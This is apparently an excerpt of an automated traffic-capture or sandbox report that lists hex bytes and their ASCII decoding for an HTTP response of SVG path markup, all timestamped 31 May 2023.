                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC738INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC754INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC770INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC786INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC802INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC818INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC834INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC850INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC866INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC882INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC898INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC914INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC930INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC946INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC962INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC978INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                                        Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC994INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
